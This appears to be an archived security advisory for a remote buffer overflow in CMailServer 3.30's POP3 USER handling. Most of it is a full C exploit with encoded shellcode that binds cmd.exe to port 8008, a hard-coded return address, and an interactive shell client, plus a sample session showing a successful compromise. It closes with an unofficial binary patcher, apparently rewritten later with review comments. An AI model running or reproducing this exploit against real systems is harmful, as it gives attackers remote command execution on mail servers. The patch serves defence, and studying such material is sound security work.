|
COMMAND CMailServer remote buffer overflow SYSTEMS AFFECTED CMailServer 3.30 PROBLEM 2c79cbe14ac7d0b8472d3f129fa1df55, the original pimp, says : CMailServer uses sprintf() without any previous bounds checking while testing for the presence of the passed USER argument\'s home directory within \'mail\'.. sprintf(%s\\\\mail\\\\%s, CMail path ptr, USER arg ptr) you know how the story goes, we can overwrite some serious EIP action.. see attached exploit.. a patch has also been included to prevent ownaging Exploit ======= /* cmeexp.c May 20, 2002 CMailServer 3.30 uses sprintf() without any previous bounds checking while testing for the presence of the passed USER argument\'s home directory within \'mail\'.. sprintf(%s\\\\mail\\\\%s, CMail path ptr, USER arg ptr) you know how the story goes, we can overwrite some serious EIP action.. USER <510 bytes><EIP> the payload is on the right as I didn\'t bother finding or making one fit on the left [xx@xxxx cmail]$ ./cmeexp the.man CMailServer 3.30 remote \'root\' exploit (05/20/2002) 2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com connecting... connected.. sending code code dumped.. connecting to port 8008... success! izn0rw3ned! Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. E:\\Program Files\\CMailServer>date The current date is: Mon 20/05/2002 Enter the new date: (dd-mm-yy) */ #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/errno.h> /* Win2k SP2 + all hotfixes up until May 20th */ /* you\'ve got one shot at this as cmail is */ /* going down if you miss.. */ /* this is the most consistant EIP hit on my */ /* test machine although freshly booted she */ /* tended to be \"\\x6d\\xa7\\xdb\\x02\" */ /* try in offsets of 0x100000 if you must.. */ #define EIP \"\\x6d\\xa7\\x0e\\x03\" /* everything all rolled into one.. bind\'s cmd.exe */ /* to port 8008.. 
this is a modified version of the */ /* shellcode created by |Zan\'s excellent generator */ char shell[] = \"\\x55\\x53\\x45\\x52\\x20\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" 
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x90\\x90\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\" \"\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\\x7f\\x83\\xee\" \"\\x7f\\x83\\xee\\x4c\\xff\\xd6\"EIP\"\\x55\\x8b\\xec\\x68\\x5e\\x56\\xc3\" \"\\x90\\x54\\x59\\xff\\xd1\\x58\\x33\\xc9\\xb1\\x1c\\x90\\x90\\x90\\x90\" \"\\x03\\xf1\\x56\\x5f\\x33\\xc9\\x66\\xb9\\x95\\x04\\x90\\x90\\x90\\xac\" \"\\x34\\x13\\xaa\\xe2\\xfa\\xfb\\x13\\x13\\x13\\x13\\x4e\\x92\\xfe\\xca\" \"\\x32\\x53\\x13\\x9e\\xa6\\xe1\\x37\\x53\\x13\\x9e\\xae\\xe9\\x37\\x53\" \"\\x13\\x79\\x14\\x83\\x83\\x83\\x83\\x4a\\xfb\\xc1\\x11\\x13\\x13\\x9e\" \"\\xa6\\x39\\x36\\x53\\x13\\x9e\\xae\\x20\\x36\\x53\\x13\\x79\\x19\\x83\" \"\\x83\\x83\\x83\\x4a\\xfb\\xa9\\x11\\x13\\x13\\x79\\x13\\x9e\\xa6\\xca\" \"\\x36\\x53\\x13\\x45\\x9e\\xa6\\xf6\\x36\\x53\\x13\\x45\\x9e\\xa6\\xfa\" \"\\x36\\x53\\x13\\x45\\xec\\x86\\x20\\x36\\x53\\x13\\x79\\x13\\x9e\\xa6\" \"\\xca\\x36\\x53\\x13\\x45\\x9e\\xa6\\xfe\\x36\\x53\\x13\\x45\\x9e\\xa6\" \"\\xe2\\x36\\x53\\x13\\x45\\xec\\x86\\x20\\x36\\x53\\x13\\xd4\\x96\\xe6\" \"\\x36\\x53\\x13\\x57\\x13\\x13\\x13\\x9e\\xa6\\xe6\\x36\\x53\\x13\\x45\" \"\\xec\\x86\\x24\\x36\\x53\\x13\\x9e\\xa6\\x3e\\x35\\x53\\x13\\xbe\\x43\" 
\"\\xec\\x86\\x40\\x36\\x53\\x13\\x9e\\xa6\\x22\\x35\\x53\\x13\\xbe\\x43\" \"\\xec\\x86\\x40\\x36\\x53\\x13\\x9e\\xa6\\xe2\\x36\\x53\\x13\\x9e\\xae\" \"\\x3e\\x35\\x53\\x13\\xb6\\x9e\\xa6\\xf6\\x36\\x53\\x13\\xbe\\x9e\\xae\" \"\\x22\\x35\\x53\\x13\\xb8\\x9e\\xae\\x26\\x35\\x53\\x13\\xb8\\xd4\\x96\" \"\\x36\\x35\\x53\\x13\\x13\\x13\\x13\\x13\\xd4\\x96\\x32\\x35\\x53\\x13\" \"\\x12\\x12\\x13\\x13\\x9e\\xa6\\x2a\\x35\\x53\\x13\\x45\\x9e\\xa6\\xe6\" \"\\x36\\x53\\x13\\x45\\x79\\x13\\x79\\x13\\x79\\x03\\x79\\x12\\x79\\x13\" \"\\x79\\x13\\x9e\\xa6\\x5a\\x35\\x53\\x13\\x45\\x79\\x13\\xec\\x86\\x28\" \"\\x36\\x53\\x13\\x7b\\x13\\x33\\x13\\x13\\x83\\x7b\\x13\\x11\\x13\\x13\" \"\\xec\\x86\\x50\\x36\\x53\\x13\\x9a\\x96\\x42\\x35\\x53\\x13\\x20\\xd3\" \"\\x43\\x53\\x43\\x53\\x43\\xec\\x86\\xe9\\x37\\x53\\x13\\x43\\x48\\x79\" \"\\x03\\x9e\\xa6\\xda\\x36\\x53\\x13\\x45\\x40\\xec\\x86\\xed\\x37\\x53\" \"\\x13\\x79\\x10\\x40\\xec\\x86\\x11\\x36\\x53\\x13\\x9e\\xa6\\x46\\x35\" \"\\x53\\x13\\x45\\x9e\\xa6\\xda\\x36\\x53\\x13\\x45\\x40\\xec\\x86\\x15\" \"\\x36\\x53\\x13\\x9e\\xae\\x4a\\x35\\x53\\x13\\xb8\\x20\\xd3\\x43\\x9e\" \"\\xae\\x76\\x35\\x53\\x13\\x44\\x43\\x43\\x43\\x9e\\xa6\\xfa\\x36\\x53\" \"\\x13\\xbe\\x43\\xec\\x86\\x2c\\x36\\x53\\x13\\x79\\x23\\xec\\x86\\x5c\" \"\\x36\\x53\\x13\\xf8\\x5e\\x83\\x83\\x83\\x20\\xd3\\x43\\x9e\\xae\\x76\" \"\\x35\\x53\\x13\\x44\\x43\\x43\\x43\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\" \"\\x43\\xec\\x86\\x2c\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\" \"\\x13\\x90\\xae\\x76\\x35\\x53\\x13\\x11\\x1c\\x91\\x04\\x12\\x13\\x13\" \"\\x92\\xae\\x76\\x35\\x53\\x13\\x12\\x33\\x13\\x13\\x61\\x1d\\x83\\x83\" \"\\x83\\x83\\xd4\\x96\\x76\\x35\\x53\\x13\\x13\\x33\\x13\\x13\\x79\\x13\" \"\\x98\\x96\\x76\\x35\\x53\\x13\\x9e\\xae\\x76\\x35\\x53\\x13\\x44\\x43\" \"\\x98\\x96\\x42\\x35\\x53\\x13\\x43\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\" \"\\x43\\xec\\x86\\x54\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\" 
\"\\x13\\x98\\x96\\x76\\x35\\x53\\x13\\x79\\x13\\x43\\x9e\\xa6\\x42\\x35\" \"\\x53\\x13\\xbe\\x43\\x9e\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\" \"\\x19\\x36\\x53\\x13\\x79\\x13\\x9e\\xae\\x76\\x35\\x53\\x13\\x44\\x79\" \"\\x13\\x79\\x13\\x79\\x13\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\\x43\\xec\" \"\\x86\\x2c\\x36\\x53\\x13\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\\x13\\x20\" \"\\xda\\x2a\\x9e\\x76\\x35\\x53\\x13\\x1c\\x94\\x74\\xec\\xec\\xec\\x79\" \"\\x13\\x7b\\x13\\x33\\x13\\x13\\x83\\x9e\\xa6\\x42\\x35\\x53\\x13\\xbe\" \"\\x43\\x9e\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x1d\\x36\\x53\" \"\\x13\\x9a\\x96\\x72\\x35\\x53\\x13\\x79\\x13\\x9e\\xae\\x76\\x35\\x53\" \"\\x13\\x44\\x43\\x9e\\xa6\\x42\\x35\\x53\\x13\\xbe\\x43\\x9e\\xa6\\xfe\" \"\\x36\\x53\\x13\\xbe\\x43\\xec\\x86\\x58\\x36\\x53\\x13\\x79\\x43\\xec\" \"\\x86\\x5c\\x36\\x53\\x13\\x79\\x13\\x98\\x96\\x72\\x35\\x53\\x13\\x9e\" \"\\xae\\x76\\x35\\x53\\x13\\x44\\x43\\x98\\x96\\x42\\x35\\x53\\x13\\x43\" \"\\x9e\\xa6\\xfa\\x36\\x53\\x13\\xbe\\x43\\xec\\x86\\x54\\x36\\x53\\x13\" \"\\x79\\x43\\xec\\x86\\x5c\\x36\\x53\\x13\\xfa\\xaa\\xed\\xec\\xec\\x9e\" \"\\xa6\\x4a\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x01\\x36\\x53\\x13\\x9e\" \"\\xa6\\x4e\\x35\\x53\\x13\\xbe\\x43\\xec\\x86\\x01\\x36\\x53\\x13\\x79\" \"\\x13\\xec\\x86\\x44\\x36\\x53\\x13\\x42\\x45\\x7b\\xd3\\xf1\\x56\\x13\" \"\\x83\\x49\\xec\\x01\\x43\\x48\\x4a\\x44\\x4d\\x42\\x45\\x40\\x7b\\xd7\" \"\\xf1\\x56\\x13\\x83\\x49\\xec\\x01\\x43\\xbf\\x97\\xd3\\x66\\xe8\\x4b\" \"\\xb8\\x4a\\xf1\\xfa\\xd0\\x44\\x40\\x5c\\x50\\x58\\x20\\x21\\x13\\x60\" \"\\x7c\\x70\\x78\\x76\\x67\\x13\\x71\\x7a\\x7d\\x77\\x13\\x7f\\x7a\\x60\" \"\\x67\\x76\\x7d\\x13\\x72\\x70\\x70\\x76\\x63\\x67\\x13\\x60\\x76\\x7d\" \"\\x77\\x13\\x61\\x76\\x70\\x65\\x13\\x70\\x7f\\x7c\\x60\\x76\\x60\\x7c\" \"\\x70\\x78\\x76\\x67\\x13\\x58\\x56\\x41\\x5d\\x56\\x5f\\x20\\x21\\x13\" \"\\x50\\x61\\x76\\x72\\x67\\x76\\x43\\x7a\\x63\\x76\\x13\\x54\\x76\\x67\" 
\"\\x40\\x67\\x72\\x61\\x67\\x66\\x63\\x5a\\x7d\\x75\\x7c\\x52\\x13\\x50\" \"\\x61\\x76\\x72\\x67\\x76\\x43\\x61\\x7c\\x70\\x76\\x60\\x60\\x52\\x13\" \"\\x43\\x76\\x76\\x78\\x5d\\x72\\x7e\\x76\\x77\\x43\\x7a\\x63\\x76\\x13\" \"\\x54\\x7f\\x7c\\x71\\x72\\x7f\\x52\\x7f\\x7f\\x7c\\x70\\x13\\x41\\x76\" \"\\x72\\x77\\x55\\x7a\\x7f\\x76\\x13\\x44\\x61\\x7a\\x67\\x76\\x55\\x7a\" \"\\x7f\\x76\\x13\\x40\\x7f\\x76\\x76\\x63\\x13\\x50\\x7f\\x7c\\x60\\x76\" \"\\x5b\\x72\\x7d\\x77\\x7f\\x76\\x13\\x56\\x6b\\x7a\\x67\\x43\\x61\\x7c\" \"\\x70\\x76\\x60\\x60\\x13\\x50\\x7c\\x77\\x76\\x77\\x33\\x71\\x6a\\x33\" \"\\x6f\\x49\\x72\\x7d\\x33\\x2f\\x7a\\x69\\x72\\x7d\\x53\\x77\\x76\\x76\" \"\\x63\\x69\\x7c\\x7d\\x76\\x3d\\x7c\\x61\\x74\\x2d\\x11\\x13\\x0c\\x5b\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x1f\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x12\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x50\\x5e\" \"\\x57\\x3d\\x56\\x4b\\x56\\x13\\x13\\x13\\x13\\x13\\x03\\x13\\x13\\x13\" \"\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\\x13\" \"\\x13\\x13\\x1a\\x1a\\x1a\\x1a\\x1a\\x90\\x90\\x90\\x0d\\x0a\"; main(char argc, char **argv){ int fd; int bufsize = 1024; int buffer = malloc(bufsize); struct sockaddr_in sin; struct hostent *he; struct in_addr in; printf(\"CMailServer 3.30 remote \'root\' exploit (05/20/2002)\\n\"); printf(\"2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com\\n\\n\\n\"); if (argc < 2){ printf(\"Usage: <hostname>\\n\"); exit(-1); } if((fd = 
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror(\"socket error\");exit(-1);} if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);} else if ((inet_aton(argv[1], &in)) < 0){printf(\"unable to resolve host\");exit(-1);} sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(inet_ntoa(in)); sin.sin_port = htons(110); printf(\"connecting...\\n\"); if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror(\"connection error\");exit(-1);} printf(\"\\nconnected.. sending code\\n\\n\"); if(write(fd, shell, strlen(shell)) < strlen(shell)){perror(\"write error\");exit(-1);} printf(\"code dumped..\\n\\n\"); close(fd); if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror(\"socket error\");exit(-1);} sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(8008); printf(\"connecting to tcp port 8008...\\n\"); sleep(1); if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){printf(\"exploit failed.. adjust EIP?\\n\\n\");exit(-1);} printf(\"success! izn0rw3ned!\\n\\n\"); while(1) { fd_set input; FD_SET(0,&input); FD_SET(fd,&input); if((select(fd+1,&input,NULL,NULL,NULL))<0) { if(errno==EINTR) continue; printf(\"connection reset\\n\"); fflush(stdout); exit(1); } if(FD_ISSET(fd,&input)) write(1,buffer,read(fd,buffer,bufsize)); if(FD_ISSET(0,&input)) write(fd,buffer,read(0,buffer,bufsize)); } close(fd); } SOLUTION Unofficial patcher for v.3.30 : /* cmepatch.c May 20, 2002 this is a quick and dirty patch.. it simply adds functionality that inserts a NULL as the 200th byte of the passed USER argument prior to the affected sprintf().. 
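not even remotely elegant but enough to stop you from getting izn0wn3D I TAKE NO RESPONSIBILITY FOR THE DAMAGE THIS MAY DO TO YOUR SYSTEM, EGO, WEEWEE, OR OTHERWISE ;~~~~~< 2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com */
#include <stdio.h>

/*
 * cmepatch: in-place binary patcher for CMailServer.exe (v3.30 per the advisory).
 *
 * It overwrites three fixed file offsets in "CMailServer.exe" in the current
 * working directory. According to the author's header comment, the effect is
 * to force a NUL terminator into the USER argument before the unbounded
 * sprintf() runs, which truncates the string that sprintf() copies.
 *
 * NOTE(review): the offsets below are only meaningful for the exact build the
 * author patched. Nothing here verifies the target's version, size or hash
 * before writing, and the advisory gives no reference hash or original bytes
 * to compare against. Back up the executable and confirm it is the 3.30 build
 * before running this; applying it to any other build will corrupt the file.
 * This is a stopgap; a vendor release with a bounded format call is the
 * real fix.
 */

/* Shared file handle; kept at file scope as in the original listing. */
FILE *cmail;

/*
 * Patch payloads. Stored as unsigned char because values such as 0xd0 and
 * 0xe9 do not fit a signed char without an implementation-defined conversion.
 *
 * p1: two bytes written at file offset 0x1e8.
 *     NOTE(review): presumably a PE header field adjustment - confirm.
 * p2: decodes as x86 `jmp rel32` plus two NOPs (7 bytes). From file offset
 *     0x159f4 the displacement 0x00048216 lands on 0x5dc0f, where p3 goes.
 * p3: the detour stub. Decodes as: add esp,0x2415 / mov byte [esp],0 /
 *     sub esp,0x2415 / lea edi,[esp+0x234d] / jmp rel32 / nop. The final jmp
 *     lands on 0x159fb, the byte right after the 7-byte detour.
 *     NOTE(review): the lea is presumably the displaced original
 *     instruction - confirm against an unpatched binary.
 */
const unsigned char p1[] = {0x00, 0xd0};
const unsigned char p2[] = {0xe9, 0x16, 0x82, 0x04, 0x00, 0x90, 0x90};
const unsigned char p3[] = {0x81, 0xc4, 0x15, 0x24, 0x00, 0x00, 0xc6, 0x04,
                            0x24, 0x00, 0x81, 0xec, 0x15, 0x24, 0x00, 0x00,
                            0x8d, 0xbc, 0x24, 0x4d, 0x23, 0x00, 0x00, 0xe9,
                            0xd0, 0x7d, 0xfb, 0xff, 0x90};

/* Seek to `offset` and write `len` bytes; returns 0 on success, -1 on any failure. */
static int write_at(FILE *f, long offset, const unsigned char *bytes, size_t len)
{
    if (fseek(f, offset, SEEK_SET) != 0) {
        return -1;
    }
    return fwrite(bytes, 1, len, f) == len ? 0 : -1;
}

/*
 * Apply the three patches and report the outcome.
 *
 * Returns 0 when every write and the final fclose() succeeded, 1 otherwise.
 * The original printed "patch successful" unconditionally, even if a seek or
 * write had failed; every I/O result is now checked.
 */
int main(void)
{
    printf("CMailServer 3.30 PATCH (May 20, 2002)\n2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com\n\n");

    cmail = fopen("CMailServer.exe", "rb+");
    if (!cmail) {
        printf("'CMailServer.exe' not found or write protected\n");
        return 1;
    }

    /*
     * The stub (p3) is written before the detour (p2) so that an interrupted
     * run cannot leave a jump pointing at bytes that were never written.
     * The resulting file contents are the same as with the original order.
     */
    if (write_at(cmail, 0x1e8, p1, sizeof p1) != 0 ||
        write_at(cmail, 0x5dc0f, p3, sizeof p3) != 0 ||
        write_at(cmail, 0x159f4, p2, sizeof p2) != 0) {
        fprintf(stderr, "patch failed: 'CMailServer.exe' may be partially modified, restore it from a backup\n");
        fclose(cmail);
        return 1;
    }

    /* fclose() flushes buffered writes, so its result decides success. */
    if (fclose(cmail) != 0) {
        fprintf(stderr, "patch failed: could not flush 'CMailServer.exe', restore it from a backup\n");
        return 1;
    }

    printf("patch successful\n");
    return 0;
}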